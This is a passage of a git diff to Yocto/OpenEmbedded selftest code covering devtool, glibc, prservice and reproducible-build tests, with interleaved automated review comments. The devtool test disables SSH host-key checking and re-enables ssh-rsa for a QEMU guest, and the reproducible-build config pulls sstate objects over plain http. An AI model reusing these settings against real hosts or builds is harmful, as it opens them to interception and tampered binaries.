result = runCmd('git diff %s' % os.path.basename(recipefile), cwd=os.path.dirname(recipefile))
- addlines = ['SRCREV = ".*"', 'SRC_URI = "git://git.infradead.org/mtd-utils.git"']
+ addlines = ['SRCREV = ".*"', 'SRC_URI = "git://git.infradead.org/mtd-utils.git;branch=master"']
srcurilines = src_uri.split()
srcurilines[0] = 'SRC_URI = "' + srcurilines[0]
srcurilines.append('"')
@@ -1285,7 +1331,7 @@ class DevtoolExtractTests(DevtoolBase):
# Now really test deploy-target
result = runCmd('devtool deploy-target -c %s root@%s' % (testrecipe, qemu.ip))
# Run a test command to see if it was installed properly
- sshargs = '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
+ sshargs = '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -o HostKeyAlgorithms=+ssh-rsa'
result = runCmd('ssh %s root@%s %s' % (sshargs, qemu.ip, testcommand))
# Check if it deployed all of the files with the right ownership/perms
# First look on the host - need to do this under pseudo to get the correct ownership/perms
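Review bot: `-o HostKeyAlgorithms=+ssh-rsa` re-enables the SHA-1 based `ssh-rsa` host key signature, on top of `StrictHostKeyChecking=no` and `UserKnownHostsFile=/dev/null`, and nothing next to `sshargs` says why. Against the throwaway QEMU guest this is tolerable because the host key is not verified anyway. A comment should record that scope so the string is not copied into code that talks to real targets, for example `# host key checks are disabled and ssh-rsa re-enabled only for the local QEMU test target; do not reuse for real hosts`. Presumably the target's SSH server offers only ssh-rsa keys; if so, say that in the comment as well. The enclosing test starts and ends outside the hunk.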
diff --git a/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt b/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt
new file mode 100644
index 0000000000..f70f10e4db
--- /dev/null
+++ b/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt
@@ -0,0 +1 @@
+A
diff --git a/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt b/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt
new file mode 100644
index 0000000000..223b7836fb
--- /dev/null
+++ b/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt
@@ -0,0 +1 @@
+B
diff --git a/meta/lib/oeqa/selftest/cases/distrodata.py b/meta/lib/oeqa/selftest/cases/distrodata.py
index e1cfc3b621..8e5e24db3d 100644
--- a/meta/lib/oeqa/selftest/cases/distrodata.py
+++ b/meta/lib/oeqa/selftest/cases/distrodata.py
@@ -63,7 +63,7 @@ but their recipes claim otherwise by setting UPSTREAM_VERSION_UNKNOWN. Please re
return True
return False
- feature = 'require conf/distro/include/maintainers.inc\nLICENSE_FLAGS_WHITELIST += " commercial"\nPARSE_ALL_RECIPES = "1"\n'
+ feature = 'require conf/distro/include/maintainers.inc\nLICENSE_FLAGS_WHITELIST += " commercial"\nPARSE_ALL_RECIPES = "1"\nPACKAGE_CLASSES = "package_ipk package_deb package_rpm"\n'
self.write_config(feature)
with bb.tinfoil.Tinfoil() as tinfoil:
diff --git a/meta/lib/oeqa/selftest/cases/glibc.py b/meta/lib/oeqa/selftest/cases/glibc.py
index c687f6ef93..c1f6e4c1fb 100644
--- a/meta/lib/oeqa/selftest/cases/glibc.py
+++ b/meta/lib/oeqa/selftest/cases/glibc.py
@@ -33,7 +33,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
ptestsuite = "glibc-user" if ssh is None else "glibc"
self.ptest_section(ptestsuite)
- with open(os.path.join(builddir, "tests.sum"), "r") as f:
+ with open(os.path.join(builddir, "tests.sum"), "r", errors='replace') as f:
for test, result in parse_values(f):
self.ptest_result(ptestsuite, test, result)
@@ -41,7 +41,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
with contextlib.ExitStack() as s:
# use the base work dir, as the nfs mount, since the recipe directory may not exist
tmpdir = get_bb_var("BASE_WORKDIR")
- nfsport, mountport = s.enter_context(unfs_server(tmpdir))
+ nfsport, mountport = s.enter_context(unfs_server(tmpdir, udp = False))
# build core-image-minimal with required packages
default_installed_packages = [
@@ -61,7 +61,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
bitbake("core-image-minimal")
# start runqemu
- qemu = s.enter_context(runqemu("core-image-minimal", runqemuparams = "nographic"))
+ qemu = s.enter_context(runqemu("core-image-minimal", runqemuparams = "nographic", qemuparams = "-m 1024"))
# validate that SSH is working
status, _ = qemu.run("uname")
@@ -70,7 +70,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
# setup nfs mount
if qemu.run("mkdir -p \"{0}\"".format(tmpdir))[0] != 0:
raise Exception("Failed to setup NFS mount directory on target")
- mountcmd = "mount -o noac,nfsvers=3,port={0},udp,mountport={1} \"{2}:{3}\" \"{3}\"".format(nfsport, mountport, qemu.server_ip, tmpdir)
+ mountcmd = "mount -o noac,nfsvers=3,port={0},mountport={1} \"{2}:{3}\" \"{3}\"".format(nfsport, mountport, qemu.server_ip, tmpdir)
status, output = qemu.run(mountcmd)
if status != 0:
raise Exception("Failed to setup NFS mount on target ({})".format(repr(output)))
diff --git a/meta/lib/oeqa/selftest/cases/gotoolchain.py b/meta/lib/oeqa/selftest/cases/gotoolchain.py
index 3119520f0d..59f80aad28 100644
--- a/meta/lib/oeqa/selftest/cases/gotoolchain.py
+++ b/meta/lib/oeqa/selftest/cases/gotoolchain.py
@@ -43,6 +43,12 @@ class oeGoToolchainSelfTest(OESelftestTestCase):
@classmethod
def tearDownClass(cls):
+ # Go creates file which are readonly
+ for dirpath, dirnames, filenames in os.walk(cls.tmpdir_SDKQA):
+ for filename in filenames + dirnames:
+ f = os.path.join(dirpath, filename)
+ if not os.path.islink(f):
+ os.chmod(f, 0o775)
shutil.rmtree(cls.tmpdir_SDKQA, ignore_errors=True)
super(oeGoToolchainSelfTest, cls).tearDownClass()
diff --git a/meta/lib/oeqa/selftest/cases/imagefeatures.py b/meta/lib/oeqa/selftest/cases/imagefeatures.py
index 2b9c4998f7..535d80cb86 100644
--- a/meta/lib/oeqa/selftest/cases/imagefeatures.py
+++ b/meta/lib/oeqa/selftest/cases/imagefeatures.py
@@ -240,7 +240,7 @@ USERADD_GID_TABLES += "files/static-group"
def test_no_busybox_base_utils(self):
config = """
# Enable x11
-DISTRO_FEATURES_append += "x11"
+DISTRO_FEATURES_append = " x11"
# Switch to systemd
DISTRO_FEATURES += "systemd"
diff --git a/meta/lib/oeqa/selftest/cases/oelib/elf.py b/meta/lib/oeqa/selftest/cases/oelib/elf.py
index d0a28090f2..5a5f9b4fdf 100644
--- a/meta/lib/oeqa/selftest/cases/oelib/elf.py
+++ b/meta/lib/oeqa/selftest/cases/oelib/elf.py
@@ -21,6 +21,6 @@ class TestElf(TestCase):
self.assertEqual(oe.qa.elf_machine_to_string(0xB7), "AArch64")
self.assertEqual(oe.qa.elf_machine_to_string(0xF7), "BPF")
- self.assertEqual(oe.qa.elf_machine_to_string(0x00), "Unknown (0)")
+ self.assertEqual(oe.qa.elf_machine_to_string(0x00), "Unset")
self.assertEqual(oe.qa.elf_machine_to_string(0xDEADBEEF), "Unknown (3735928559)")
self.assertEqual(oe.qa.elf_machine_to_string("foobar"), "Unknown ('foobar')")
diff --git a/meta/lib/oeqa/selftest/cases/oelib/utils.py b/meta/lib/oeqa/selftest/cases/oelib/utils.py
index a7214beb4c..bbf67bf9c9 100644
--- a/meta/lib/oeqa/selftest/cases/oelib/utils.py
+++ b/meta/lib/oeqa/selftest/cases/oelib/utils.py
@@ -64,7 +64,7 @@ class TestMultiprocessLaunch(TestCase):
import bb
def testfunction(item, d):
- if item == "2" or item == "1":
+ if item == "2":
raise KeyError("Invalid number %s" % item)
return "Found %s" % item
@@ -99,5 +99,4 @@ class TestMultiprocessLaunch(TestCase):
# Assert the function prints exceptions
with captured_output() as (out, err):
self.assertRaises(bb.BBHandledException, multiprocess_launch, testfunction, ["1", "2", "3", "4", "5", "6"], d, extraargs=(d,))
- self.assertIn("KeyError: 'Invalid number 1'", out.getvalue())
self.assertIn("KeyError: 'Invalid number 2'", out.getvalue())
diff --git a/meta/lib/oeqa/selftest/cases/oescripts.py b/meta/lib/oeqa/selftest/cases/oescripts.py
index 726daff7c6..fb99be447e 100644
--- a/meta/lib/oeqa/selftest/cases/oescripts.py
+++ b/meta/lib/oeqa/selftest/cases/oescripts.py
@@ -133,7 +133,8 @@ class OEListPackageconfigTests(OEScriptTests):
def check_endlines(self, results, expected_endlines):
for line in results.output.splitlines():
for el in expected_endlines:
- if line.split() == el.split():
+ if line and line.split()[0] == el.split()[0] and \
+ ' '.join(sorted(el.split())) in ' '.join(sorted(line.split())):
expected_endlines.remove(el)
break
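Review bot: The new condition compares space-joined sorted token strings with `in`, which is a substring test rather than a token-set test. An extra token in `line` that sorts between two expected tokens makes the match fail, while an expected token that is only a prefix of a longer token in `line` can make it succeed. If the intent is "same first token and every expected token present in any order", then `if line and line.split()[0] == el.split()[0] and set(el.split()) <= set(line.split()):` states that directly. `el.split()[0]` also raises `IndexError` if an expected line is ever empty. The rest of check_endlines lies outside the hunk.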
diff --git a/meta/lib/oeqa/selftest/cases/pkgdata.py b/meta/lib/oeqa/selftest/cases/pkgdata.py
index 833a1803ba..254abc40c6 100644
--- a/meta/lib/oeqa/selftest/cases/pkgdata.py
+++ b/meta/lib/oeqa/selftest/cases/pkgdata.py
@@ -218,3 +218,9 @@ class OePkgdataUtilTests(OESelftestTestCase):
def test_specify_pkgdatadir(self):
result = runCmd('oe-pkgdata-util -p %s lookup-pkg zlib' % get_bb_var('PKGDATA_DIR'))
self.assertEqual(result.output, 'libz1')
+
+ def test_no_param(self):
+ result = runCmd('oe-pkgdata-util', ignore_status=True)
+ self.assertEqual(result.status, 2, "Status different than 2. output: %s" % result.output)
+ currpos = result.output.find('usage: oe-pkgdata-util')
+ self.assertTrue(currpos != -1, msg = "Test is Failed. Help is not Displayed in %s" % result.output)
diff --git a/meta/lib/oeqa/selftest/cases/prservice.py b/meta/lib/oeqa/selftest/cases/prservice.py
index 85b534963d..fdc1e40058 100644
--- a/meta/lib/oeqa/selftest/cases/prservice.py
+++ b/meta/lib/oeqa/selftest/cases/prservice.py
@@ -23,7 +23,7 @@ class BitbakePrTests(OESelftestTestCase):
package_data_file = os.path.join(self.pkgdata_dir, 'runtime', package_name)
package_data = ftools.read_file(package_data_file)
find_pr = re.search(r"PKGR: r[0-9]+\.([0-9]+)", package_data)
- self.assertTrue(find_pr, "No PKG revision found in %s" % package_data_file)
+ self.assertTrue(find_pr, "No PKG revision found via regex 'PKGR: r[0-9]+\.([0-9]+)' in %s" % package_data_file)
return int(find_pr.group(1))
def get_task_stamp(self, package_name, recipe_task):
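Review bot: The new assertion message embeds `\.` in a normal (non-raw) string literal, which is an invalid escape sequence. Python emits a DeprecationWarning for it, and a SyntaxWarning from 3.12 on. The message also duplicates the pattern already passed to `re.search`, so the two can drift apart. Define the pattern once, `pkgr_pattern = r"PKGR: r[0-9]+\.([0-9]+)"`, then use `re.search(pkgr_pattern, package_data)` and `"No PKG revision found via regex '%s' in %s" % (pkgr_pattern, package_data_file)`.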
@@ -40,7 +40,7 @@ class BitbakePrTests(OESelftestTestCase):
return str(stamps[0])
def increment_package_pr(self, package_name):
- inc_data = "do_package_append() {\n bb.build.exec_func('do_test_prserv', d)\n}\ndo_test_prserv() {\necho \"The current date is: %s\"\n}" % datetime.datetime.now()
+ inc_data = "do_package_append() {\n bb.build.exec_func('do_test_prserv', d)\n}\ndo_test_prserv() {\necho \"The current date is: %s\" > ${PKGDESTWORK}/${PN}.datestamp\n}" % datetime.datetime.now()
self.write_recipeinc(package_name, inc_data)
res = bitbake(package_name, ignore_status=True)
self.delete_recipeinc(package_name)
@@ -63,7 +63,7 @@ class BitbakePrTests(OESelftestTestCase):
pr_2 = self.get_pr_version(package_name)
stamp_2 = self.get_task_stamp(package_name, track_task)
- self.assertTrue(pr_2 - pr_1 == 1, "Step between pkg revisions is not 1 (was %s - %s)" % (pr_2, pr_1))
+ self.assertTrue(pr_2 - pr_1 == 1, "New PR %s did not increment as expected (from %s), difference should be 1" % (pr_2, pr_1))
self.assertTrue(stamp_1 != stamp_2, "Different pkg rev. but same stamp: %s" % stamp_1)
def run_test_pr_export_import(self, package_name, replace_current_db=True):
@@ -75,7 +75,7 @@ class BitbakePrTests(OESelftestTestCase):
exported_db_path = os.path.join(self.builddir, 'export.inc')
export_result = runCmd("bitbake-prserv-tool export %s" % exported_db_path, ignore_status=True)
self.assertEqual(export_result.status, 0, msg="PR Service database export failed: %s" % export_result.output)
- self.assertTrue(os.path.exists(exported_db_path))
+ self.assertTrue(os.path.exists(exported_db_path), msg="%s didn't exist, tool output %s" % (exported_db_path, export_result.output))
if replace_current_db:
current_db_path = os.path.join(get_bb_var('PERSISTENT_DIR'), 'prserv.sqlite3')
@@ -89,7 +89,7 @@ class BitbakePrTests(OESelftestTestCase):
self.increment_package_pr(package_name)
pr_2 = self.get_pr_version(package_name)
- self.assertTrue(pr_2 - pr_1 == 1, "Step between pkg revisions is not 1 (was %s - %s)" % (pr_2, pr_1))
+ self.assertTrue(pr_2 - pr_1 == 1, "New PR %s did not increment as expected (from %s), difference should be 1" % (pr_2, pr_1))
def test_import_export_replace_db(self):
self.run_test_pr_export_import('m4')
diff --git a/meta/lib/oeqa/selftest/cases/pseudo.py b/meta/lib/oeqa/selftest/cases/pseudo.py
new file mode 100644
index 0000000000..33593d5ce9
--- /dev/null
+++ b/meta/lib/oeqa/selftest/cases/pseudo.py
@@ -0,0 +1,27 @@
+#
+# SPDX-License-Identifier: MIT
+#
+
+import glob
+import os
+import shutil
+from oeqa.utils.commands import bitbake, get_test_layer
+from oeqa.selftest.case import OESelftestTestCase
+
+class Pseudo(OESelftestTestCase):
+
+ def test_pseudo_pyc_creation(self):
+ self.write_config("")
+
+ metaselftestpath = get_test_layer()
+ pycache_path = os.path.join(metaselftestpath, 'lib/__pycache__')
+ if os.path.exists(pycache_path):
+ shutil.rmtree(pycache_path)
+
+ bitbake('pseudo-pyc-test -c install')
+
+ test1_pyc_present = len(glob.glob(os.path.join(pycache_path, 'pseudo_pyc_test1.*.pyc')))
+ self.assertTrue(test1_pyc_present, 'test1 pyc file missing, should be created outside of pseudo context.')
+
+ test2_pyc_present = len(glob.glob(os.path.join(pycache_path, 'pseudo_pyc_test2.*.pyc')))
+ self.assertFalse(test2_pyc_present, 'test2 pyc file present, should not be created in pseudo context.')
diff --git a/meta/lib/oeqa/selftest/cases/recipetool.py b/meta/lib/oeqa/selftest/cases/recipetool.py
index c2ade2543a..e8aeea3023 100644
--- a/meta/lib/oeqa/selftest/cases/recipetool.py
+++ b/meta/lib/oeqa/selftest/cases/recipetool.py
@@ -370,7 +370,7 @@ class RecipetoolTests(RecipetoolBase):
tempsrc = os.path.join(self.tempdir, 'srctree')
os.makedirs(tempsrc)
recipefile = os.path.join(self.tempdir, 'libmatchbox.bb')
- srcuri = 'git://git.yoctoproject.org/libmatchbox'
+ srcuri = 'git://git.yoctoproject.org/libmatchbox;branch=master'
result = runCmd(['recipetool', 'create', '-o', recipefile, srcuri + ";rev=9f7cf8895ae2d39c465c04cc78e918c157420269", '-x', tempsrc])
self.assertTrue(os.path.isfile(recipefile), 'recipetool did not create recipe file; output:\n%s' % result.output)
checkvars = {}
@@ -456,7 +456,7 @@ class RecipetoolTests(RecipetoolBase):
self.assertTrue(os.path.isfile(recipefile))
checkvars = {}
checkvars['LICENSE'] = set(['Apache-2.0'])
- checkvars['SRC_URI'] = 'git://github.com/mesonbuild/meson;protocol=https'
+ checkvars['SRC_URI'] = 'git://github.com/mesonbuild/meson;protocol=https;branch=master'
inherits = ['setuptools3']
self._test_recipe_contents(recipefile, checkvars, inherits)
@@ -523,7 +523,7 @@ class RecipetoolTests(RecipetoolBase):
self.assertTrue(os.path.isfile(recipefile))
checkvars = {}
checkvars['LICENSE'] = set(['GPLv2'])
- checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/matchbox-terminal;protocol=http'
+ checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/matchbox-terminal;protocol=http;branch=master'
inherits = ['pkgconfig', 'autotools']
self._test_recipe_contents(recipefile, checkvars, inherits)
diff --git a/meta/lib/oeqa/selftest/cases/reproducible.py b/meta/lib/oeqa/selftest/cases/reproducible.py
index 5d3959be77..be4cdcc429 100644
--- a/meta/lib/oeqa/selftest/cases/reproducible.py
+++ b/meta/lib/oeqa/selftest/cases/reproducible.py
@@ -17,6 +17,57 @@ import stat
import os
import datetime
+# For sample packages, see:
+# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201127-0t7wr_oo/
+# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201127-4s9ejwyp/
+# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201127-haiwdlbr/
+# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201127-hwds3mcl/
+# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201203-sua0pzvc/
+# (both packages/ and packages-excluded/)
+exclude_packages = [
+ 'acpica-src',
+ 'babeltrace2-ptest',
+ 'bind',
+ 'bootchart2-doc',
+ 'epiphany',
+ 'gcr',
+ 'glide',
+ 'go-dep',
+ 'go-helloworld',
+ 'go-runtime',
+ 'go_',
+ 'gstreamer1.0-python',
+ 'hwlatdetect',
+ 'kernel-devsrc',
+ 'libcap-ng',
+ 'libjson',
+ 'libproxy',
+ 'lttng-tools-dbg',
+ 'lttng-tools-ptest',
+ 'ltp',
+ 'ovmf-shell-efi',
+ 'parted-ptest',
+ 'perf',
+ 'piglit',
+ 'pybootchartgui',
+ 'qemu',
+ 'quilt-ptest',
+ 'rsync',
+ 'ruby',
+ 'stress-ng',
+ 'systemd-bootchart',
+ 'systemtap',
+ 'valgrind-ptest',
+ 'webkitgtk',
+ ]
+
+def is_excluded(package):
+ package_name = os.path.basename(package)
+ for i in exclude_packages:
+ if package_name.startswith(i):
+ return i
+ return None
+
MISSING = 'MISSING'
DIFFERENT = 'DIFFERENT'
SAME = 'SAME'
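Review bot: `is_excluded()` matches with `package_name.startswith(i)`, so each `exclude_packages` entry is a bare filename prefix. `'qemu'`, `'bind'`, `'perf'` or `'ruby'` would also exclude any unrelated package whose name merely begins with those letters. Because an excluded package no longer lands in `different`, an over-broad prefix can hide a genuinely non-reproducible package from this check. Either anchor the match at a name boundary, for example `package_name.startswith((i + '-', i + '_'))` with the `'go_'` entry changed to `'go'`, or add a comment above the list such as `# entries are filename prefixes and deliberately match every sub-package of the recipe`. `is_excluded` also has no docstring stating that it returns the matching prefix or `None`.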
@@ -39,14 +90,21 @@ class PackageCompareResults(object):
self.total = []
self.missing = []
self.different = []
+ self.different_excluded = []
self.same = []
+ self.active_exclusions = set()
def add_result(self, r):
self.total.append(r)
if r.status == MISSING:
self.missing.append(r)
elif r.status == DIFFERENT:
- self.different.append(r)
+ exclusion = is_excluded(r.reference)
+ if exclusion:
+ self.different_excluded.append(r)
+ self.active_exclusions.add(exclusion)
+ else:
+ self.different.append(r)
else:
self.same.append(r)
@@ -54,10 +112,14 @@ class PackageCompareResults(object):
self.total.sort()
self.missing.sort()
self.different.sort()
+ self.different_excluded.sort()
self.same.sort()
def __str__(self):
- return 'same=%i different=%i missing=%i total=%i' % (len(self.same), len(self.different), len(self.missing), len(self.total))
+ return 'same=%i different=%i different_excluded=%i missing=%i total=%i\nunused_exclusions=%s' % (len(self.same), len(self.different), len(self.different_excluded), len(self.missing), len(self.total), self.unused_exclusions())
+
+ def unused_exclusions(self):
+ return sorted(set(exclude_packages) - self.active_exclusions)
def compare_file(reference, test, diffutils_sysroot):
result = CompareResult()
@@ -68,7 +130,7 @@ def compare_file(reference, test, diffutils_sysroot):
result.status = MISSING
return result
- r = runCmd(['cmp', '--quiet', reference, test], native_sysroot=diffutils_sysroot, ignore_status=True)
+ r = runCmd(['cmp', '--quiet', reference, test], native_sysroot=diffutils_sysroot, ignore_status=True, sync=False)
if r.status:
result.status = DIFFERENT
@@ -77,9 +139,41 @@ def compare_file(reference, test, diffutils_sysroot):
result.status = SAME
return result
+def run_diffoscope(a_dir, b_dir, html_dir, **kwargs):
+ return runCmd(['diffoscope', '--no-default-limits', '--exclude-directory-metadata', 'yes', '--html-dir', html_dir, a_dir, b_dir],
+ **kwargs)
+
+class DiffoscopeTests(OESelftestTestCase):
+ diffoscope_test_files = os.path.join(os.path.dirname(os.path.abspath(__file__)), "diffoscope")
+
+ def test_diffoscope(self):
+ bitbake("diffoscope-native -c addto_recipe_sysroot")
+ diffoscope_sysroot = get_bb_var("RECIPE_SYSROOT_NATIVE", "diffoscope-native")
+
+ # Check that diffoscope doesn't return an error when the files compare
+ # the same (a general check that diffoscope is working)
+ with tempfile.TemporaryDirectory() as tmpdir:
+ run_diffoscope('A', 'A', tmpdir,
+ native_sysroot=diffoscope_sysroot, cwd=self.diffoscope_test_files)
+
+ # Check that diffoscope generates an index.html file when the files are
+ # different
+ with tempfile.TemporaryDirectory() as tmpdir:
+ r = run_diffoscope('A', 'B', tmpdir,
+ native_sysroot=diffoscope_sysroot, ignore_status=True, cwd=self.diffoscope_test_files)
+
+ self.assertNotEqual(r.status, 0, msg="diffoscope was successful when an error was expected")
+ self.assertTrue(os.path.exists(os.path.join(tmpdir, 'index.html')), "HTML index not found!")
+
class ReproducibleTests(OESelftestTestCase):
+ # Test the reproducibility of whatever is built between sstate_targets and targets
+
package_classes = ['deb', 'ipk']
- images = ['core-image-minimal', 'core-image-sato', 'core-image-full-cmdline']
+
+ # targets are the things we want to test the reproducibility of
+ targets = ['core-image-minimal', 'core-image-sato', 'core-image-full-cmdline', 'world']
+ # sstate targets are things to pull from sstate to potentially cut build/debugging time
+ sstate_targets = []
save_results = False
if 'OEQA_DEBUGGING_SAVED_OUTPUT' in os.environ:
save_results = os.environ['OEQA_DEBUGGING_SAVED_OUTPUT']
@@ -94,7 +188,7 @@ class ReproducibleTests(OESelftestTestCase):
def setUpLocal(self):
super().setUpLocal()
- needed_vars = ['TOPDIR', 'TARGET_PREFIX', 'BB_NUMBER_THREADS']
+ needed_vars = ['TOPDIR', 'TARGET_PREFIX', 'BB_NUMBER_THREADS', 'BB_HASHSERVE']
bb_vars = get_bb_vars(needed_vars)
for v in needed_vars:
setattr(self, v.lower(), bb_vars[v])
@@ -150,20 +244,29 @@ class ReproducibleTests(OESelftestTestCase):
PACKAGE_CLASSES = "{package_classes}"
INHIBIT_PACKAGE_STRIP = "1"
TMPDIR = "{tmpdir}"
+ LICENSE_FLAGS_WHITELIST = "commercial"
+ DISTRO_FEATURES_append = ' systemd pam'
''').format(package_classes=' '.join('package_%s' % c for c in self.package_classes),
tmpdir=tmpdir)
if not use_sstate:
+ if self.sstate_targets:
+ self.logger.info("Building prebuild for %s (sstate allowed)..." % (name))
+ self.write_config(config)
+ bitbake(' '.join(self.sstate_targets))
+
# This config fragment will disable using shared and the sstate
# mirror, forcing a complete build from scratch
config += textwrap.dedent('''\
SSTATE_DIR = "${TMPDIR}/sstate"
- SSTATE_MIRROR = ""
+ SSTATE_MIRRORS = "file://.*/.*-native.* http://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH file://.*/.*-cross.* http://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH"
''')
+ self.logger.info("Building %s (sstate%s allowed)..." % (name, '' if use_sstate else ' NOT'))
self.write_config(config)
d = get_bb_vars(capture_vars)
- bitbake(' '.join(self.images))
+ # targets used to be called images
+ bitbake(' '.join(getattr(self, 'images', self.targets)))
return d
def test_reproducible_builds(self):
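Review bot: The retained comment still says this fragment disables the sstate mirror and forces a complete build from scratch, but the new `SSTATE_MIRRORS` line lets the "NOT allowed" build fetch prebuilt `-native` and `-cross` objects from a remote mirror over plain `http://`. Those objects execute on the build host and feed the packages being compared, so the comment should say so, e.g. `# Use a private sstate dir; only -native and -cross objects may still come from the public mirror`. If the mirror serves TLS, I would use `https://` in both URLs. Whether signature checking (`SSTATE_VERIFY_SIG`) is active for this build is not visible in the hunk. do_test_build starts outside the hunk.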
@@ -187,6 +290,7 @@ class ReproducibleTests(OESelftestTestCase):
self.logger.info('Non-reproducible packages will be copied to %s', save_dir)
vars_A = self.do_test_build('reproducibleA', self.build_from_sstate)
+
vars_B = self.do_test_build('reproducibleB', False)
# NOTE: The temp directories from the reproducible build are purposely
@@ -201,6 +305,7 @@ class ReproducibleTests(OESelftestTestCase):
deploy_A = vars_A['DEPLOY_DIR_' + c.upper()]
deploy_B = vars_B['DEPLOY_DIR_' + c.upper()]
+ self.logger.info('Checking %s packages for differences...' % c)
result = self.compare_packages(deploy_A, deploy_B, diffutils_sysroot)
self.logger.info('Reproducibility summary for %s: %s' % (c, result))
@@ -209,6 +314,7 @@ class ReproducibleTests(OESelftestTestCase):
self.write_package_list(package_class, 'missing', result.missing)
self.write_package_list(package_class, 'different', result.different)
+ self.write_package_list(package_class, 'different_excluded', result.different_excluded)
self.write_package_list(package_class, 'same', result.same)
if self.save_results:
@@ -216,8 +322,12 @@ class ReproducibleTests(OESelftestTestCase):
self.copy_file(d.reference, '/'.join([save_dir, 'packages', strip_topdir(d.reference)]))
self.copy_file(d.test, '/'.join([save_dir, 'packages', strip_topdir(d.test)]))
+ for d in result.different_excluded:
+ self.copy_file(d.reference, '/'.join([save_dir, 'packages-excluded', strip_topdir(d.reference)]))
+ self.copy_file(d.test, '/'.join([save_dir, 'packages-excluded', strip_topdir(d.test)]))
+
if result.missing or result.different:
- fails.append("The following %s packages are missing or different: %s" %
+ fails.append("The following %s packages are missing or different and not in exclusion list: %s" %
(c, '\n'.join(r.test for r in (result.missing + result.different))))
# Clean up empty directories
@@ -232,7 +342,7 @@ class ReproducibleTests(OESelftestTestCase):
# Copy jquery to improve the diffoscope output usability
self.copy_file(os.path.join(jquery_sysroot, 'usr/share/javascript/jquery/jquery.min.js'), os.path.join(package_html_dir, 'jquery.js'))
- runCmd(['diffoscope', '--no-default-limits', '--exclude-directory-metadata', '--html-dir', package_html_dir, 'reproducibleA', 'reproducibleB'],
+ run_diffoscope('reproducibleA', 'reproducibleB', package_html_dir,
native_sysroot=diffoscope_sysroot, ignore_status=True, cwd=package_dir)
if fails:
diff --git a/meta/lib/oeqa/selftest/cases/runcmd.py b/meta/lib/oeqa/selftest/cases/runcmd.py
index fa6113d7fa..e9612389fe 100644
--- a/meta/lib/oeqa/selftest/cases/runcmd.py
+++ b/meta/lib/oeqa/selftest/cases/runcmd.py
@@ -27,8 +27,8 @@ class RunCmdTests(OESelftestTestCase):
# The delta is intentionally smaller than the timeout, to detect cases where
# we incorrectly apply the timeout more than once.
- TIMEOUT = 5
- DELTA = 3
+ TIMEOUT = 10
+ DELTA = 8
def test_result_okay(self):
result = runCmd("true")
diff --git a/meta/lib/oeqa/selftest/cases/runqemu.py b/meta/lib/oeqa/selftest/cases/runqemu.py
index 7e676bcb41..da22f77b27 100644
--- a/meta/lib/oeqa/selftest/cases/runqemu.py
+++ b/meta/lib/oeqa/selftest/cases/runqemu.py
@@ -163,12 +163,11 @@ class QemuTest(OESelftestTestCase):
bitbake(cls.recipe)
def _start_qemu_shutdown_check_if_shutdown_succeeded(self, qemu, timeout):
+ # Allow the runner's LoggingThread instance to exit without errors
+ # (such as the exception "Console connection closed unexpectedly")
+ # as qemu will disappear when we shut it down
+ qemu.runner.allowexit()
qemu.run_serial("shutdown -h now")
- # Stop thread will stop the LoggingThread instance used for logging
- # qemu through serial console, stop thread will prevent this code
- # from facing exception (Console connection closed unexpectedly)
- # when qemu was shutdown by the above shutdown command
- qemu.runner.stop_thread()
time_track = 0
try:
while True:
diff --git a/meta/lib/oeqa/selftest/cases/runtime_test.py b/meta/lib/oeqa/selftest/cases/runtime_test.py
index cd03069340..cc4190c1d6 100644
--- a/meta/lib/oeqa/selftest/cases/runtime_test.py
+++ b/meta/lib/oeqa/selftest/cases/runtime_test.py
@@ -14,11 +14,6 @@ from oeqa.core.decorator.data import skipIfNotQemu
class TestExport(OESelftestTestCase):
- @classmethod
- def tearDownClass(cls):
- runCmd("rm -rf /tmp/sdk")
- super(TestExport, cls).tearDownClass()
-
def test_testexport_basic(self):
"""
Summary: Check basic testexport functionality with only ping test enabled.
@@ -95,19 +90,20 @@ class TestExport(OESelftestTestCase):
msg = "Couldn't find SDK tarball: %s" % tarball_path
self.assertEqual(os.path.isfile(tarball_path), True, msg)
- # Extract SDK and run tar from SDK
- result = runCmd("%s -y -d /tmp/sdk" % tarball_path)
- self.assertEqual(0, result.status, "Couldn't extract SDK")
+ with tempfile.TemporaryDirectory() as tmpdirname:
+ # Extract SDK and run tar from SDK
+ result = runCmd("%s -y -d %s" % (tarball_path, tmpdirname))
+ self.assertEqual(0, result.status, "Couldn't extract SDK")
- env_script = result.output.split()[-1]
- result = runCmd(". %s; which tar" % env_script, shell=True)
- self.assertEqual(0, result.status, "Couldn't setup SDK environment")
- is_sdk_tar = True if "/tmp/sdk" in result.output else False
- self.assertTrue(is_sdk_tar, "Couldn't setup SDK environment")
+ env_script = result.output.split()[-1]
+ result = runCmd(". %s; which tar" % env_script, shell=True)
+ self.assertEqual(0, result.status, "Couldn't setup SDK environment")
+ is_sdk_tar = True if tmpdirname in result.output else False
+ self.assertTrue(is_sdk_tar, "Couldn't setup SDK environment")
- tar_sdk = result.output
- result = runCmd("%s --version" % tar_sdk)
- self.assertEqual(0, result.status, "Couldn't run tar from SDK")
+ tar_sdk = result.output
+ result = runCmd("%s --version" % tar_sdk)
+ self.assertEqual(0, result.status, "Couldn't run tar from SDK")
class TestImage(OESelftestTestCase):
